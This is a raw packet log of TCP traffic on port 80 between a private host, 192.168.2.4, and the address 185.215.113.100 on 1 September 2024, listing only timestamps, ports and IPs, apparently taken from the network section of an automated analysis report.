Sep 1, 2024 23:03:41.637454987 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.637516022 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.637552023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:41.720015049 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.720026016 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:41.720084906 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.031142950 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.031155109 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.031225920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.113977909 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.113987923 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.114047050 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.653157949 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.653172970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.653182983 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.653217077 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.653251886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.653283119 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.860594034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.860605955 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.860691071 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.943382025 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.943417072 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:42.943432093 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:42.943468094 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:43.052989006 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:43.053056002 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:43.053112984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:43.053124905 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:43.053169012 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:43.053284883 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:43.053293943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:43.053334951 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:44.099958897 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:44.100044012 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:44.100044966 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:44.100084066 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.389178038 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.389199018 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.389208078 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.389343023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.389343023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.451847076 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.451858997 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.451868057 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.452008963 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.452008963 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.672399044 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.672454119 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.672544956 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.672558069 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.672591925 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851013899 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851094961 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851176023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851176023 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851332903 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851375103 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851381063 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851387978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851413965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851425886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851556063 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851578951 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:45.851608038 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:45.851629019 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.051793098 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051806927 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051851988 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051855087 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.051886082 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.051928043 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051939964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051949978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.051975012 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.051999092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.249320030 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.249393940 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.249404907 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.249427080 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.249439001 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.249443054 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.249450922 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.249474049 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.249500036 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.448506117 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.448537111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.448546886 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.448559999 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.448584080 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.448584080 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.448596954 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.448626041 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.531079054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.531090021 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.531162977 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.654767990 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.654793978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.654859066 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.654880047 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.655122042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655132055 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655175924 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.655240059 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655263901 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655275106 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655287027 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.655309916 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.655391932 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655402899 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.655442953 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.857770920 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.857783079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.857861042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.857871056 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.857881069 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.857924938 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.858026981 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858098984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858109951 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858127117 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.858143091 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.858467102 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858510017 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858519077 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:46.858522892 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.858546972 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:46.858566999 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.062585115 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.062597036 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.062648058 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063038111 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063061953 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063090086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063117981 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063147068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063198090 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063209057 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063220978 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063255072 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063591003 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063630104 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063635111 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063644886 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.063667059 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.063684940 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.261881113 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.261956930 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262027979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262038946 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262073040 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262084961 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262320042 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262331009 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262340069 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262371063 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262389898 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262608051 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262654066 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.262793064 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262801886 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.262839079 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.475289106 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475322962 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475337982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475409031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475450993 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.475477934 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.475930929 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475986958 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.475995064 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.475999117 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.476051092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.476067066 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.476075888 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.476088047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.476144075 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.476491928 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.476545095 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.558017015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.558034897 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.558114052 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.679392099 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.679406881 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.679420948 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.679490089 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.679527044 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680143118 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680162907 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680200100 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680211067 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680227995 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680248976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680278063 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680291891 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680537939 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680589914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680592060 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:47.680600882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:47.680643082 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.092757940 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.092786074 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.092833042 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.092860937 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511142015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511168957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511195898 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511240005 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511276007 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511301994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511315107 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511316061 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511336088 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511351109 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511419058 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511435986 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.511456966 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.511475086 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.512173891 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.512222052 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:48.512247086 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:48.512284994 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.117153883 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.117172003 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.117311954 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.337133884 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.337146044 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.337203026 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.337265968 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.337275982 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.337281942 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.337311029 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.548311949 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.548336029 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.548404932 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.548458099 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.548513889 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.548532963 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.548557043 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:49.548558950 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:49.548598051 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018280983 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018292904 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018341064 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018341064 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018351078 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018382072 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018393040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018405914 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018428087 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018455982 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.018488884 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.018522978 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.175069094 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.175093889 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.175139904 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.175174952 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.653781891 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.653801918 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.653812885 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.653824091 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.653836012 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.653871059 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.653925896 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.847932100 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.847944975 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.848145962 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.930676937 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.930695057 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:50.930749893 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:50.930763006 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.044867992 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.044879913 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.044910908 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.044966936 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.044976950 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.045145035 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.246339083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.246351957 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.246503115 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.246511936 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.246545076 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.246787071 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.514993906 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.515019894 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.515073061 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.515093088 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.515256882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.515306950 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.515943050 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.515989065 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.515999079 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.516010046 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.516036987 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.516052008 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.549223900 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.549233913 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.549282074 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.659702063 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.659712076 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.659717083 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.659894943 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.732989073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.733000994 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.733010054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.733227015 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:51.897535086 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.897550106 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:51.897727966 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.211265087 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.211278915 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.211328030 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.361216068 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.361298084 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.361366034 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.361376047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.361417055 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.361417055 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.365142107 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.365143061 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.629148006 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.629173040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.629199982 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.629224062 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.629225969 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.629261971 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.629750013 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.629759073 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.629790068 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.629825115 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.665868044 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.665883064 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.665919065 CEST	49730	80	192.168.2.4	185.215.113.100
